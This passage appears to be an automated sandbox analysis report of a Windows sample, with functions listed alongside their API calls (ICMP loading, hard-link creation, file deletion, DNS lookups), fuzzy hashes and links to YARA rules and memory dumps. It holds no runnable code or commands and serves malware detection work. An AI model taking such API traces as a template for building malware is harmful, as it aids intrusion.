          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AddressLibraryLoadProc
          • String ID: ICMP.DLL$IcmpCloseHandle
          • API String ID: 2574300362-3530519716
          • Opcode ID: 6812dc84b8ff773435734ab9e7b9341acf17894536097686d2b62f567ecc21ef
          • Instruction ID: 6f6813d6b1db310e31602be5c5edcff881427b2a8d34089ea52a8013c0ca2cbf
          • Opcode Fuzzy Hash: 6812dc84b8ff773435734ab9e7b9341acf17894536097686d2b62f567ecc21ef
          • Instruction Fuzzy Hash: AEE0C2B0449306AFD7384F57D4886427BEC9F54212B20442DEA42D2510C7B0E08487A4
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0116125D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
          Download Yara Rule
          APIs
          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0116126F
          • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 01161281
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AddressLibraryLoadProc
          • String ID: ICMP.DLL$IcmpCreateFile
          • API String ID: 2574300362-275556492
          • Opcode ID: 5b8180695d8304167227de6a15c0b09f74c8e8c0c9c42482e63d8efb333abdd5
          • Instruction ID: b052e86920798bf26b05000da721fb751e79cd5a27498868e969c95bd951f7c8
          • Opcode Fuzzy Hash: 5b8180695d8304167227de6a15c0b09f74c8e8c0c9c42482e63d8efb333abdd5
          • Instruction Fuzzy Hash: EDE0C2B0409306AFD7684F56D4446467BECAB18212B20442DFD42D2520CB71E0848BA4
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011A812C, Relevance: 6.2, APIs: 4, Instructions: 176COMMON
          Download Yara Rule
          APIs
            • Part of subcall function 01131D10: _wcslen.LIBCMT ref: 01131D11
            • Part of subcall function 01131D10: _memmove.LIBCMT ref: 01131D57
          • SetErrorMode.KERNEL32 ref: 011A8188
          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 011A8341
            • Part of subcall function 0116397D: GetFileAttributesW.KERNELBASE(?), ref: 01163984
          • SetErrorMode.KERNEL32(?), ref: 011A822A
          • SetErrorMode.KERNEL32(?), ref: 011A82FA
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ErrorMode$AttributesFile_memmove_wcslen
          • String ID:
          • API String ID: 3884216118-0
          • Opcode ID: ccea8b5b1cb2965cfd87691b39db145da7491a7cd01bc80fe0abc8078ee71ab3
          • Instruction ID: 4490f8406a6ed34a72ca3510991f3efb5cf85fee949bc1f618bf6119f1a76bc1
          • Opcode Fuzzy Hash: ccea8b5b1cb2965cfd87691b39db145da7491a7cd01bc80fe0abc8078ee71ab3
          • Instruction Fuzzy Hash: 4E616B716083419FC718EF68D880A5BBBE0BFD8718F44891DFA999B350C772E945CB92
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011A94BA, Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
          Download Yara Rule
          APIs
          • VariantInit.OLEAUT32(?), ref: 011A94C9
          • SysAllocString.OLEAUT32(00000000), ref: 011A9592
          • VariantCopy.OLEAUT32(?,?), ref: 011A95C9
          • VariantClear.OLEAUT32(?), ref: 011A960A
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Variant$AllocClearCopyInitString
          • String ID:
          • API String ID: 2808897238-0
          • Opcode ID: 397f772e39667d8e77c8d91644c942e1baa110c533f6f1863146551ee882333c
          • Instruction ID: 64d5cf04f7812af0158ea735c6c42ea583548eb57e1faf31ad1b2c18fe52cc9c
          • Opcode Fuzzy Hash: 397f772e39667d8e77c8d91644c942e1baa110c533f6f1863146551ee882333c
          • Instruction Fuzzy Hash: 7C51F83920420E97CB18FF29D8405ADBB64EF94359F808526ED18DB244DB30DA55C7E2
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0114407F, Relevance: 6.1, APIs: 4, Instructions: 130COMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
          • String ID:
          • API String ID: 2782032738-0
          • Opcode ID: 5577a25a8bf7660d1eb98eb86be2243cf7e8e14d6244587b41df67c47af93e11
          • Instruction ID: eb4a0285cc5193ee5fe05cea11f6b3242bb02773892cdd8cd9b521de00b20bb0
          • Opcode Fuzzy Hash: 5577a25a8bf7660d1eb98eb86be2243cf7e8e14d6244587b41df67c47af93e11
          • Instruction Fuzzy Hash: 9B41E431B007459BEF2DCFA9C88479FBBB5AF90F64F288628D51597A80D770EA51CB40
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011715F9, Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
          Download Yara Rule
          APIs
          • ClientToScreen.USER32(00000000,?), ref: 01171621
          • GetWindowRect.USER32 ref: 011716A9
          • PtInRect.USER32(?,?,?), ref: 011716BB
          • MessageBeep.USER32(00000000), ref: 01171734
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Rect$BeepClientMessageScreenWindow
          • String ID:
          • API String ID: 1352109105-0
          • Opcode ID: 8502bd3850e376b0ef4f6a967a616663f90416b430f2b59bba8f9c41bfa62983
          • Instruction ID: 8a6c561993228324a49eadf1eda29911780f8ce93940f9c5df92d4247abe2be9
          • Opcode Fuzzy Hash: 8502bd3850e376b0ef4f6a967a616663f90416b430f2b59bba8f9c41bfa62983
          • Instruction Fuzzy Hash: 1741DA79B00205EFD719CF59D484EAABBB9FF89320F1882B9E9158B345C730A881CF50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0118D19C, Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
          Download Yara Rule
          APIs
          • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0118D235
          • GetLastError.KERNEL32(?,00000000), ref: 0118D259
          • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0118D279
          • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0118D297
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CreateHardLink$DeleteErrorFileLast
          • String ID:
          • API String ID: 3321077145-0
          • Opcode ID: 98a380142589c0b67a369fb936008fc0c87ab2ced01b3129e98b361c23e0a1ca
          • Instruction ID: 3d286cbbf0e2702d4e4db04c31cdd81f2c8276a0960a5d285cffd46f0764653b
          • Opcode Fuzzy Hash: 98a380142589c0b67a369fb936008fc0c87ab2ced01b3129e98b361c23e0a1ca
          • Instruction Fuzzy Hash: 8431AEB5910206ABDB18FFA5C888A1AB7A9FF94328F14C959EC54A7340CB35FC41CB90
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01180311, Relevance: 6.1, APIs: 4, Instructions: 102COMMON
          Download Yara Rule
          APIs
          • GetParent.USER32(?), ref: 0118033E
          • DefDlgProcW.USER32(?,00000138,?,?), ref: 0118038D
          • DefDlgProcW.USER32(?,00000133,?,?), ref: 011803DC
          • DefDlgProcW.USER32(?,00000134,?,?), ref: 0118040D
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Proc$Parent
          • String ID:
          • API String ID: 2351499541-0
          • Opcode ID: e9fcd5cadcb00dcb2a52261efa7636165536dfe67e0cffaa3bd315bca08bb4ce
          • Instruction ID: 3faf1912cc5f1959f6e4eee38821fa44efbb4587a0f80b4151c5741c639e660b
          • Opcode Fuzzy Hash: e9fcd5cadcb00dcb2a52261efa7636165536dfe67e0cffaa3bd315bca08bb4ce
          • Instruction Fuzzy Hash: 9031C9362051086FD738DE2DDC84DAB7B28EF89335B148615FA258B2D2C771944ACB60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011793FE, Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 01160593: _wcspbrk.LIBCMT ref: 011605A3
          • SendMessageW.USER32(?,00001002,00000000,?), ref: 011793D0
          • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 01179460
          • _wcslen.LIBCMT ref: 01179472
          • _wcslen.LIBCMT ref: 0117947F
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: MessageSend_wcslen$_wcspbrk
          • String ID:
          • API String ID: 2886238975-0
          • Opcode ID: 9f3307a29982954c260e94755ef9bad9994aab49edb575219fe5c7d7270783b3
          • Instruction ID: 11862f6227a11f9cef82d1dd04f51732419f92077d8a149961f182e6e3590f53
          • Opcode Fuzzy Hash: 9f3307a29982954c260e94755ef9bad9994aab49edb575219fe5c7d7270783b3
          • Instruction Fuzzy Hash: 5E213A7670020C96D738DF5DE881BEEB378EBA4734F10416EFE0986240D7725598C791
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011AA224, Relevance: 6.1, APIs: 4, Instructions: 78COMMON
          Download Yara Rule
          APIs
            • Part of subcall function 0119F356: IsWindow.USER32(00000000), ref: 0119F386
          • GetWindowLongW.USER32(?,000000EC), ref: 011AA299
          • SetWindowLongW.USER32 ref: 011AA2B4
          • SetWindowLongW.USER32 ref: 011AA2CC
          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 011AA2DB
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Window$Long$AttributesLayered
          • String ID:
          • API String ID: 2169480361-0
          • Opcode ID: ee8371e8d4b63e1e4d58466b9eff7b63b45415d604e3531ffaf0250ac8701f85
          • Instruction ID: 37003227e21bc9ab43914cfbb66619d27a6e3c7b81328d6f0984e5a59856664f
          • Opcode Fuzzy Hash: ee8371e8d4b63e1e4d58466b9eff7b63b45415d604e3531ffaf0250ac8701f85
          • Instruction Fuzzy Hash: FD21C0322055146FE324AB18EC44FABBBA8EF91334F244226F825D7290C775AC95C7A4
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0119C57B, Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 0118875F: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D204E858,00000000,00000000,00000000,00000000,?,?,?,01196CC2,?,011A3B72,011A3B72,?), ref: 0118877B
          • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0119C5A6
          • WSAGetLastError.WSOCK32(00000000), ref: 0119C5B2
          • _memmove.LIBCMT ref: 0119C5EE
          • inet_ntoa.WSOCK32(?), ref: 0119C5FA
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
          • String ID:
          • API String ID: 2502553879-0
          • Opcode ID: 4b1518de1d2ba43ac0ee81bfdd7bb3424d5019e872853b17ca7adeff117166a1
          • Instruction ID: 4bac9f25b853b94e1730e9d15ecc9e0f910841a81b448cddb92b5afb39a1ad3f
          • Opcode Fuzzy Hash: 4b1518de1d2ba43ac0ee81bfdd7bb3424d5019e872853b17ca7adeff117166a1
          • Instruction Fuzzy Hash: E9219072A00205ABCB08FBB4D884C9FB7BDEF98218B108555E801E7204EB31EE05CBB1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01160165, Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
          Download Yara Rule
          APIs
          • CreateWindowExW.USER32 ref: 011601AF
          • GetStockObject.GDI32(00000011), ref: 011601C5
          • SendMessageW.USER32(00000000,00000030,00000000), ref: 011601CF
          • ShowWindow.USER32(00000000,00000000), ref: 011601EA
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Window$CreateMessageObjectSendShowStock
          • String ID:
          • API String ID: 1358664141-0
          • Opcode ID: 4de7e557ad7b8f8839791af8710d5e997f277f1d32459903254b4c489d39eea1
          • Instruction ID: 200b60b5d4474842c93103b0b80e5b852373c64de1d669990e7e26ca01bee06a
          • Opcode Fuzzy Hash: 4de7e557ad7b8f8839791af8710d5e997f277f1d32459903254b4c489d39eea1
          • Instruction Fuzzy Hash: 0D115E72200504ABE729CE59CC45FDBB7ADAF9CB10F148219FA1893294D774F891CBA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0117B574, Relevance: 6.0, APIs: 4, Instructions: 37COMMON
          Download Yara Rule
          APIs
          • EnterCriticalSection.KERNEL32(?), ref: 0117B581
          • InterlockedExchange.KERNEL32(?,?), ref: 0117B58F
          • LeaveCriticalSection.KERNEL32(?), ref: 0117B5A6
          • LeaveCriticalSection.KERNEL32(?), ref: 0117B5B8
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CriticalSection$Leave$EnterExchangeInterlocked
          • String ID:
          • API String ID: 2223660684-0
          • Opcode ID: a3e8121abf729569c6654b3f89bb01cf4929c184c6162edb9c4802e3c428ec1f
          • Instruction ID: 50fe1f956448d438d16daf480d3add48049f4f129d538d56b4dc342b125b5ffe
          • Opcode Fuzzy Hash: a3e8121abf729569c6654b3f89bb01cf4929c184c6162edb9c4802e3c428ec1f
          • Instruction Fuzzy Hash: C7F08237241104AF86285E59F8888D7B3BCFB9A7313004A2BF551C36048772F889CFB1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01177215, Relevance: 6.0, APIs: 4, Instructions: 35COMMON
          Download Yara Rule
          APIs
            • Part of subcall function 011770BF: DeleteObject.GDI32(00000000), ref: 011770FC
            • Part of subcall function 011770BF: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0117713C
            • Part of subcall function 011770BF: SelectObject.GDI32(?,00000000), ref: 0117714C
            • Part of subcall function 011770BF: BeginPath.GDI32(?), ref: 01177161
            • Part of subcall function 011770BF: SelectObject.GDI32(?,00000000), ref: 0117718A
          • MoveToEx.GDI32(?,?,?,00000000), ref: 0117723B
          • LineTo.GDI32(?,?,?), ref: 0117724A
          • EndPath.GDI32(?), ref: 0117725A
          • StrokePath.GDI32(?), ref: 01177268
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
          • String ID:
          • API String ID: 2783949968-0
          • Opcode ID: 1f540560f9595cea596adf147dbe58a7951db1be7298f1fc24e36de65a5d4b3e
          • Instruction ID: 6672a1297d534ef71af9de2a8271fa20bcd48cd02cffc697d7be86f52f9ff118
          • Opcode Fuzzy Hash: 1f540560f9595cea596adf147dbe58a7951db1be7298f1fc24e36de65a5d4b3e
          • Instruction Fuzzy Hash: E0F06D74106258BBE72AAF14AC4DFAA3B6DAB05310F008110FE21A23C5C77479858BB5
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01166406, Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
          Download Yara Rule
          APIs
          • SendMessageTimeoutW.USER32 ref: 01166425
          • GetWindowThreadProcessId.USER32(?,00000000), ref: 01166438
          • GetCurrentThreadId.KERNEL32 ref: 0116643F
          • AttachThreadInput.USER32(00000000), ref: 01166446
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
          • String ID:
          • API String ID: 2710830443-0
          • Opcode ID: 683e116790123465e662f669033e37f0e19b2dee431f62498d69cc7599550ebe
          • Instruction ID: 97bbdfadfb3fc6e5e77142ae746a8f31509c6f73b95ed15c490b0281e5e4ddeb
          • Opcode Fuzzy Hash: 683e116790123465e662f669033e37f0e19b2dee431f62498d69cc7599550ebe
          • Instruction Fuzzy Hash: 8FF06D7128030476EB396BA59C4EFDA3B5CAB14B11F508111BB10B90C1D7B5B5948769
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0114506D, Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
          Download Yara Rule
          APIs
          • __getptd_noexit.LIBCMT ref: 01145070
            • Part of subcall function 01147913: GetLastError.KERNEL32(00000003,?,01147994,?,01141259,?,?,011412DC,?,00000001), ref: 01147917
            • Part of subcall function 01147913: ___set_flsgetvalue.LIBCMT ref: 01147925
            • Part of subcall function 01147913: __calloc_crt.LIBCMT ref: 01147939
            • Part of subcall function 01147913: GetCurrentThreadId.KERNEL32 ref: 01147969
            • Part of subcall function 01147913: SetLastError.KERNEL32(00000000,?,011412DC,?,00000001), ref: 01147981
          • CloseHandle.KERNEL32(?,?,011450BB), ref: 01145084
          • __freeptd.LIBCMT ref: 0114508B
          • ExitThread.KERNEL32 ref: 01145093
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
          • String ID:
          • API String ID: 1454798553-0
          • Opcode ID: c6771383f4ddd51acd422e3f4a3a82dde41692195bc8145507f46e4e3a603d57
          • Instruction ID: 882c155e209c03835948e7874c640e19e9b0ed3f03e4e6ce5c88dbb3f5d0b9c2
          • Opcode Fuzzy Hash: c6771383f4ddd51acd422e3f4a3a82dde41692195bc8145507f46e4e3a603d57
          • Instruction Fuzzy Hash: FAD0A936806A211BE23D2278988CB0E3B669F44F31B280B00F5759B1D4DB34EA8287E0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0115F2DF, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _strncmp
          • String ID: Q\E
          • API String ID: 909875538-2189900498
          • Opcode ID: 69cc558ba4bce4714e3a9c0e61c8209572a257acfe31da90469159173270070d
          • Instruction ID: 465e920182ecf44f442d0ffe84f073fd1b63d5a8b2e06cfccbeb77f80b7d242b
          • Opcode Fuzzy Hash: 69cc558ba4bce4714e3a9c0e61c8209572a257acfe31da90469159173270070d
          • Instruction Fuzzy Hash: 0DC1D47090525BDBEFBA8F1CC0503A9BFB5AF0A214F54419ADDF497246D3709A83CB91
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0117F36A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
